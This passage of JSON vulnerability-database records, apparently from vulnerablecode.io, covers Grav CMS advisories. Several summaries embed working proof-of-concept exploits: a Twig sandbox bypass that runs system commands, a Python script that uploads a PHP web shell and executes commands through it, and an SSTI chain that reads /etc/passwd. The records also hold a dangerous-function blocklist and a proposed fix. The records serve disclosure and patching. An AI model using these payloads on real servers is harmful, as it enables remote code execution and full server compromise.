This allows an authenticated editor to add arbitrary functions to the Twig attribute `system.twig.safe_filters`, effectively bypassing the Grav CMS sandbox.\n\n## Proof of Concept (PoC)\nAn authenticated user with permission to edit a page (with Twig processing enabled) in the Grav CMS admin console can inject malicious template directives to execute arbitrary OS commands on the remote web server.\n\nFor example, to exploit the vulnerability and execute the prohibited `system('id')` command, bypassing the sandbox, an editor could create/edit a web page with the following template directives:\n\n```twig\n{% set arr = {'1':'system', '2':'exec'} %}\n{{ var_dump(grav.twig.twig_vars['config'].set('system.twig.safe_filters', arr)) }}\n{{ 'id'|system }}\n{{ 'whoami'|exec }}\n```\n\nOnce the page is saved, it can be accessed by unauthenticated users, triggering the execution of the `system('id')` command on the server hosting the vulnerable Grav CMS.\n\n## Impact\nThe vulnerability allows remote code execution on the underlying server, which could lead to full server 
compromise.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66299","reference_id":"","reference_type":"","scores":[{"value":"0.00154","scoring_system":"epss","scoring_elements":"0.35766","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66299"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:07:46Z/"}],"url":"https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-gjc5-8cfh-653x","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:07:46Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-gjc5-8cfh-653x"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66299","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H
/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66299"},{"reference_url":"https://github.com/advisories/GHSA-gjc5-8cfh-653x","reference_id":"GHSA-gjc5-8cfh-653x","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gjc5-8cfh-653x"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66299","GHSA-gjc5-8cfh-653x"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-t3bt-hrw2-jya3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/30250?format=json","vulnerability_id":"VCID-ugn8-e63y-1fes","summary":"Grav CMS is vulnerable to Cross Site Scripting (XSS) in the page editor\nGrav CMS 1.7.49 is vulnerable to Cross Site Scripting (XSS). The page editor allows authenticated users to edit page content via a Markdown editor. 
The editor fails to properly sanitize <script> tags, allowing stored XSS payloads to execute when pages are viewed in the admin interface.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-65186","reference_id":"","reference_type":"","scores":[{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10232","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-65186"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T19:31:02Z/"}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/lukehebe/Vulnerability-Disclosures/blob/main/CVE-2025-65186.pdf","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T19:31:02Z/"}],"url":"https://github.com/lukehebe/Vulnerability-Disclosures/blob/main/CVE-2025-65186.pdf"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-65186","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-65186"},{"reference_url":"https://github.com/advisories/GHSA-cchq-397m-q2qm","reference_id":"GHSA-cchq-397m-q2qm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","s
coring_elements":""}],"url":"https://github.com/advisories/GHSA-cchq-397m-q2qm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/872243?format=json","purl":"pkg:composer/getgrav/grav@1.7.49.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.49.1"}],"aliases":["CVE-2025-65186","GHSA-cchq-397m-q2qm"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ugn8-e63y-1fes"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/11664?format=json","vulnerability_id":"VCID-v5ah-z3uv-fbet","summary":"Remote Code Execution by uploading a phar file using frontmatter\n### Summary\n- Due to insufficient permission verification, a user who can write a page can use the frontmatter feature.\n- Inadequate File Name Validation\n\n### Details\n1. Insufficient Permission Verification\n\nIn Grav CMS, \"[Frontmatter](https://learn.getgrav.org/17/content/headers)\" refers to the metadata block located at the top of a Markdown file. 
Frontmatter serves the purpose of providing additional information about a specific page or post.\nIn this feature, only administrators are granted access, while regular users who can create pages are not. However, if a regular user adds the data[_json][header][form] parameter to the POST Body while creating a page, they can use Frontmatter. The demonstration of this vulnerability is provided in video format. [Video Link](https://www.youtube.com/watch?v=EU1QA0idoWE)\n\n2. Inadequate File Name Validation\n\nTo create a Contact Form, Frontmatter and markdown can be written as follows:\n[Contact Form Example](https://learn.getgrav.org/17/forms/forms/example-form)\n[Form Action Save Option](https://learn.getgrav.org/17/forms/forms/reference-form-actions#save)\nWhen an external user submits the Contact Form after filling it out, the data is stored in the user/data folder. The filename under which the data is stored corresponds to the value specified in the filename attribute of the process property. For instance, if the filename attribute has a value of \"feedback.txt,\" a feedback.txt file is created in the user/data/contact folder. This file contains the value entered by the user in the \"name\" field. The problem with this functionality is the lack of validation for the filename attribute, potentially allowing the creation of files such as phar files on the server. An attacker could input arbitrary PHP code into the \"name\" field to be saved on the server. However, Grav filters the < and > characters, so to disable these options, an xss_check: false attribute should be added. 
[Disable XSS](https://learn.getgrav.org/17/forms/forms/form-options#xss-checks)\n\n```\n---\ntitle: Contact Form\n\nform:\n    name: contact\n    xss_check: false\n\n    fields:\n        name:\n          label: Name\n          placeholder: Enter your name\n          autocomplete: on\n          type: text\n          validate:\n            required: true\n\n    buttons:\n        submit:\n          type: submit\n          value: Submit\n\n    process:\n        save:\n            filename: this_is_file_name.phar\n            operation: add\n\n---\n\n# Contact form\n\nSome sample page content\n```\n\nExploiting these two vulnerabilities allows the following scenario:\n\n- A regular user account capable of creating pages is required.\n- An attacker creates a Contact Form page containing malicious Frontmatter using the regular user's account.\n- Accessing the Contact Form page, the attacker submits PHP code.\n- The attacker attempts Remote Code Execution by accessing HOST/user/data/[form-name]/[filename].\n\n### PoC\n\n[PoC Video Link](https://www.youtube.com/watch?v=Gh3ezpORbPc)\n\n```python\n# PoC.py\nimport requests\nfrom bs4 import BeautifulSoup\n\nclass Poc:\n\n    def __init__(self, cmd):\n        self.sess = requests.Session()\n\n        ##########    INIT    ################\n        self.USERNAME = \"guest\"\n        self.PASSWORD = \"Guest123!\"\n        self.PREFIX_URL = \"http://192.168.12.119:8888/grav\"\n        self.PAGE_NAME = \"this_is_poc_page47\"\n        self.PHP_FILE_NAME = \"universe.phar\"\n        self.PAYLOAD = '<?php system($_GET[\"cmd\"]); ?>'\n        self.cmd = cmd\n        ##########    END    ################\n\n        self.sess.get(self.PREFIX_URL)\n        self._login()\n        self._save_page()\n        self._inject_command()\n        self._execute_command()\n    \n\n    def _get_nonce(self, data, name):\n        # Get login nonce value\n        res = BeautifulSoup(data, \"html.parser\")\n        return res.find(\"input\", {\"name\" : 
name}).get(\"value\")\n\n    \n    def _login(self):\n        print(\"[*] Try to Login\")\n        res = self.sess.get(self.PREFIX_URL + \"/admin\")\n\n        login_nonce = self._get_nonce(res.text, \"login-nonce\")\n\n        # Login\n        login_data = {\n            \"data[username]\" : self.USERNAME,\n            \"data[password]\" : self.PASSWORD,\n            \"task\" : \"login\",\n            \"login-nonce\" : login_nonce\n        }\n        res = self.sess.post(self.PREFIX_URL + \"/admin\", data=login_data)\n\n        # Check login\n        if res.status_code != 303:\n            print(\"[!] username or password is wrong\")\n            exit()\n        \n        print(\"[*] Success Login\")\n\n\n    def _save_page(self):\n        print(\"[*] Try to write page\")\n\n        res = self.sess.get(self.PREFIX_URL + f\"/admin/pages/{self.PAGE_NAME}/:add\")\n        form_nonce = self._get_nonce(res.text, \"form-nonce\")\n        unique_form_id = self._get_nonce(res.text, \"__unique_form_id__\")\n\n        # Add page data\n        page_data  = 
f\"task=save&data%5Bheader%5D%5Btitle%5D={self.PAGE_NAME}&data%5Bcontent%5D=content&data%5Bheader%5D%5Bsearch%5D=&data%5Bfolder%5D={self.PAGE_NAME}&data%5Broute%5D=&data%5Bname%5D=form&data%5Bheader%5D%5Bbody_classes%5D=&data%5Bordering%5D=1&data%5Border%5D=&data%5Bheader%5D%5Border_by%5D=&data%5Bheader%5D%5Border_manual%5D=&data%5Bblueprint%5D=&data%5Blang%5D=&_post_entries_save=edit&__form-name__=flex-pages&__unique_form_id__={unique_form_id}&form-nonce={form_nonce}&toggleable_data%5Bheader%5D%5Bpublished%5D=0&toggleable_data%5Bheader%5D%5Bdate%5D=0&toggleable_data%5Bheader%5D%5Bpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bunpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bmetadata%5D=0&toggleable_data%5Bheader%5D%5Bdateformat%5D=0&toggleable_data%5Bheader%5D%5Bmenu%5D=0&toggleable_data%5Bheader%5D%5Bslug%5D=0&toggleable_data%5Bheader%5D%5Bredirect%5D=0&toggleable_data%5Bheader%5D%5Bprocess%5D=0&toggleable_data%5Bheader%5D%5Btwig_first%5D=0&toggleable_data%5Bheader%5D%5Bnever_cache_twig%5D=0&toggleable_data%5Bheader%5D%5Bchild_type%5D=0&toggleable_data%5Bheader%5D%5Broutable%5D=0&toggleable_data%5Bheader%5D%5Bcache_enable%5D=0&toggleable_data%5Bheader%5D%5Bvisible%5D=0&toggleable_data%5Bheader%5D%5Bdebugger%5D=0&toggleable_data%5Bheader%5D%5Btemplate%5D=0&toggleable_data%5Bheader%5D%5Bappend_url_extension%5D=0&toggleable_data%5Bheader%5D%5Bredirect_default_route%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bdefault%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bcanonical%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Baliases%5D=0&toggleable_data%5Bheader%5D%5Badmin%5D%5Bchildren_display_order%5D=0&toggleable_data%5Bheader%5D%5Blogin%5D%5Bvisibility_requires_access%5D=0\"\n        page_data += 
f\"&data%5B_json%5D%5Bheader%5D%5Bform%5D=%7B%22xss_check%22%3Afalse%2C%22name%22%3A%22contact-form%22%2C%22fields%22%3A%7B%22name%22%3A%7B%22label%22%3A%22Name%22%2C%22placeholder%22%3A%22Enter+php+code%22%2C%22autofocus%22%3A%22on%22%2C%22autocomplete%22%3A%22on%22%2C%22type%22%3A%22text%22%2C%22validate%22%3A%7B%22required%22%3Atrue%7D%7D%7D%2C%22process%22%3A%7B%22save%22%3A%7B%22filename%22%3A%22{self.PHP_FILE_NAME}%22%2C%22operation%22%3A%22add%22%7D%7D%2C%22buttons%22%3A%7B%22submit%22%3A%7B%22type%22%3A%22submit%22%2C%22value%22%3A%22Submit%22%7D%7D%7D\"\n        res = self.sess.post(self.PREFIX_URL + f\"/admin/pages/{self.PAGE_NAME}/:add\" , data = page_data, headers = {'Content-Type': 'application/x-www-form-urlencoded'})\n\n        print(\"[*] Success write page: \" + self.PREFIX_URL + f\"/{self.PAGE_NAME}\")\n\n\n    def _inject_command(self):\n        print(\"[*] Try to inject php code\")\n\n        res = self.sess.get(self.PREFIX_URL + f\"/{self.PAGE_NAME}\")\n        form_nonce = self._get_nonce(res.text, \"form-nonce\")\n        unique_form_id = self._get_nonce(res.text, \"__unique_form_id__\")\n\n        form_data = f\"data%5Bname%5D={self.PAYLOAD}&__form-name__=contact-form&__unique_form_id__={unique_form_id}&form-nonce={form_nonce}\"\n\n        res = self.sess.post(self.PREFIX_URL + f\"/{self.PAGE_NAME}\" , data = form_data, headers = {'Content-Type': 'application/x-www-form-urlencoded'})\n\n        print(\"[*] Success inject php code\")\n\n\n    def _execute_command(self):\n        res = self.sess.get(self.PREFIX_URL + f\"/user/data/contact-form/{self.PHP_FILE_NAME}?cmd={self.cmd}\")\n\n        if res.status_code == 404:\n            print(\"[!] 
Fail to execute command or not save php file.\")\n            exit()\n\n        print(\"[*] This is uploaded php file url.\")\n        print(self.PREFIX_URL + f\"/user/data/contact-form/{self.PHP_FILE_NAME}?cmd={self.cmd}\")\n        print(res.text)\n\n\nif __name__ == \"__main__\":\n    Poc(cmd=\"id\")\n```\n\n### Impact\n\nRemote Code Execution","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27923","reference_id":"","reference_type":"","scores":[{"value":"0.05118","scoring_system":"epss","scoring_elements":"0.89986","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27923"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-08-02T18:34:03Z/"}],"url":"https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T
/P:M/B:A/M:M/D:R/2024-08-02T18:34:03Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27923","reference_id":"CVE-2024-27923","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27923"},{"reference_url":"https://github.com/advisories/GHSA-f6g2-h7qv-3m5v","reference_id":"GHSA-f6g2-h7qv-3m5v","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f6g2-h7qv-3m5v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/33911?format=json","purl":"pkg:composer/getgrav/grav@1.7.43","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-13tt-ebbj-eyg8"},{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-47rc-kqnw-7ue8"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h5a-h26f-cudw"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dmbe-mmj8-3baa"},{"vulnerability":"VCID-dmh7-xvmg-27ef"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-hdsp-4e4r-c3fh"},{"vulnerability":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-p24p-fcpe-xbah"},{"vulnerability":"VCID-rurt-s65k-1yfk"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-ugn8-e63y-1fes"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulne
rablecode.io/packages/pkg:composer/getgrav/grav@1.7.43"}],"aliases":["CVE-2024-27923","GHSA-f6g2-h7qv-3m5v"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-v5ah-z3uv-fbet"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/30408?format=json","vulnerability_id":"VCID-vp4w-2f8d-vfcf","summary":"Grav is vulnerable to RCE via SSTI through Twig Sandbox Bypass\n### Summary\nA Server-Side Template Injection (SSTI) vulnerability exists in Grav that allows authenticated attackers with editor permissions to execute arbitrary commands on the server and, under certain conditions, may also be exploited by unauthenticated attackers. This vulnerability stems from weak regex validation in the `cleanDangerousTwig` method.\n\n### Important\n- First of all this vulnerability is due to weak sanitization in the method `clearDangerousTwig`, so any other class that calls it indirectly through for example `$twig->processString` to sanitize code is also vulnerable.\n\n- For this report, we will need the official Form and Admin plugin installed, also I will be chaining this with another vulnerability to allow an editor which is a user with only pages permissions to edit the process section of a form.\n\n- I made another report for the other vulnerability which is a Broken Access Control which allows a user with full permission for pages to change the process section by intercepting the request and modifying it.\n\n### Permissions Needed\n- The main case for this vulnerability is an editor which can unconditionally takeover the whole system through creating a vulnerable form.\n- Second case is as an unauthenticated user, so if the form exists already and accepts user input and puts it through `evaluate_twig`, a guest can takeover the system.\n\n### Details\nWhen we make a form with a process section and a `message` action, when the form is submitted we get to deal with `onFormProcess` in 
`form.php` through the `message` case:\n\n```php\n            case 'message':\n                $translated_string = $this->grav['language']->translate($params);\n                $vars = array(\n                    'form' => $form\n                );\n\n                /** @var Twig $twig */\n                $twig = $this->grav['twig'];\n                $processed_string = $twig->processString($translated_string, $vars);\n\n                $form->message = $processed_string;\n                break;\n```\n\nWhich takes our parameters as in our action values, like in our case the value of our `message` action and sends it to `processString` which then calls the method `cleanDangerousTwig` from `Security.php`, now here's where we find the vulnerability is caused by two things:\n\n- First of all is weak regex which doesn't account for nested function calls, which allows us to bypass this function's sanitization\n- Second issue which is the `evaluate` and `evaluate_twig` functions which are allowed, and since we can call Twig syntax from inside them, it will lead to nested function calls which we can bypass and thus execute arbitrary payloads.\n\n```php\n    public static function cleanDangerousTwig(string $string): string\n    {\n        if ($string === '') {\n            return $string;\n        }\n\n        $bad_twig = [\n            'twig_array_map',\n            'twig_array_filter',\n            'call_user_func',\n            'registerUndefinedFunctionCallback',\n            'undefined_functions',\n            'twig.getFunction',\n            'core.setEscaper',\n            'twig.safe_functions',\n            'read_file',\n        ];\n         \n        // This allows for a payload like {{ evaluate(\"read_file('/etc/passwd')\") }}\n        $string = preg_replace('/(({{\\s*|{%\\s*)[^}]*?(' . implode('|', $bad_twig) . 
')[^}]*?(\\s*}}|\\s*%}))/i', '{# $1 #}', $string);\n        return $string;\n    }\n```\n\n### PoC\n\nFirst to showcase how the function handles the payload, I built a small PHP program that replicates the behavior of `cleanDangerousTwig`:\n\n```php\n<?php\n\nfunction cleanDangerousTwig(string $string): string\n{\n    if ($string === '') {\n        return $string;\n    }\n\n    $bad_twig = [\n        'twig_array_map',\n        'twig_array_filter',\n        'call_user_func',\n        'registerUndefinedFunctionCallback',\n        'undefined_functions',\n        'twig.getFunction',\n        'core.setEscaper',\n        'twig.safe_functions',\n        'read_file',\n    ];\n    $string = preg_replace('/(({{\\s*|{%\\s*)[^}]*?(' . implode('|', $bad_twig) . ')[^}]*?(\\s*}}|\\s*%}))/i', '{# $1 #}', $string);\n\n    return $string;\n}\n\n$x = $argv[1];\necho cleanDangerousTwig(\"evaluate_twig('$x')\");\n```\n\nWe can run the program with this payload:\n\n```bash\nphp ok.php \"{{ grav.twig.twig.registerUndefinedFunctionCallback('system') }} {% set a = grav.config.set('system.twig.undefined_functions',false) %} {{ grav.twig.twig.getFunction('cat /etc/passwd') }}\"\n```\n\nOur payload goes through and not one malicious function is filtered:\n\n```\nevaluate_twig('{# {{ grav.twig.twig.registerUndefinedFunctionCallback('system') }} #} {# {% set a = grav.config.set('system.twig.undefined_functions',false) %} #} {# {{ grav.twig.twig.getFunction('cat /etc/passwd') }} #}')\n```\n\nNow we know that our payload definitely works, so let's try it through a custom form this time, as an editor:\n\n- Go to pages\n- Add a page and create a new form or choose an existing one\n\nWe will be using another vulnerability I found which is a Broken Access Control vulnerability, which allows an editor with basically only pages rights to modify a form's action sections without being in expert mode ( please refer to [its report](https://github.com/getgrav/grav/security/advisories/GHSA-v8x2-fjv7-8hjh) ), 
so when we go to our form and save it, we can intercept the request and inject the following payload into `data[_json][header][form]` which is the header for our form which we shouldn't normally be able to modify:\n\n```\n{\"name\":\"ssti-test 2\",\"fields\":{\"name\":{\"type\":\"text\",\"label\":\"Name\",\"required\":true}},\"buttons\":{\"submit\":{\"type\":\"submit\",\"value\":\"Submit\"}},\"process\":[]}\n```\n\nURL-encode it before sending it should look something like this:\n\n![image](https://github.com/user-attachments/assets/c3345f1f-c613-4534-a15c-bd1cf7e4b2f5)\n\n![image](https://github.com/user-attachments/assets/e9685357-b85d-432a-842b-27a28487b7d1)\n\nRequest sent and processed! Now when you go to our form file you can see added a process section with the value of message changed:\n\n![image](https://github.com/user-attachments/assets/c87bdc3b-712c-465f-bd0d-9951ca826a6a)\n\nContent of form:\n\n```\ntitle: Home\nprocess:\n    markdown: true\n    twig: true\nform:\n    name: test\n    fields:\n        name:\n            type: text\n            label: Name\n            required: true\n    buttons:\n        submit:\n            type: submit\n            value: submit\n    process:\n        -\n            message: '{{ evaluate_twig(form.value(''name'')) }}'\n```\n\nNow in the process section, notice our message action is gonna take value from the Name input, using the following payload we will execute the command `id` on the system:\n\n```\n{{ grav.twig.twig.registerUndefinedFunctionCallback('system') }} {% set a = grav.config.set('system.twig.undefined_functions',false) %} {{ grav.twig.twig.getFunction('id') }}\n```\n\nNow we can visit the page and input our payload, submit and we got command result:\n\n![image](https://github.com/user-attachments/assets/46571c3c-53ad-4028-b607-8c8f1c26b0c2)\n\n\n### Impact\n\nAllows an attacker to execute arbitrary commands, leading to full system compromise, including unauthorized access, data theft, privilege 
escalation, and disruption of services.\n\n### Recommended Fix\n\n- Blacklist both the `evaluate` and `evaluate_twig` functions.\n- We could add a second check to `cleanDangerousTwig` where we would look for each malicious function no matter its position:\n\n```php\n<?php\n\nfunction cleanDangerousTwig(string $string): string\n{\n    if ($string === '') {\n        return $string;\n    }\n\n    $bad_twig = [\n        'twig_array_map',\n        'twig_array_filter',\n        'call_user_func',\n        'registerUndefinedFunctionCallback',\n        'undefined_functions',\n        'twig.getFunction',\n        'core.setEscaper',\n        'twig.safe_functions',\n        'read_file',\n    ];\n    $string = preg_replace('/(({{\\s*|{%\\s*)[^}]*?(' . implode('|', $bad_twig) . ')[^}]*?(\\s*}}|\\s*%}))/i', '{# $1 #}', $string);\n\n    foreach ($bad_twig as $func) {\n        $string = preg_replace('/\\b' . preg_quote($func, '/') . '(\\s*\\([^)]*\\))?\\b/i', '{# $1 #}', $string);\n    }\n\n    return $string;\n}\n\n$x = $argv[1];\necho cleanDangerousTwig(\"evaluate_twig('$x')\");\n```\n\nWhen we run this, the result is:\n```\nevaluate_twig('{# {{ grav.twig.twig.{#  #}('system') }} #} {# {% set a = grav.config.set('system.twig.{#  #}',false) %} #} {# {{ grav.twig.{#  #}('cat /etc/passwd') }} #}')\n```\nYou can see we managed to stop the payload and filter out the malicious 
functions.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66294","reference_id":"","reference_type":"","scores":[{"value":"0.37646","scoring_system":"epss","scoring_elements":"0.97271","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66294"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:05:10Z/"}],"url":"https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-662m-56v4-3r8f","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements"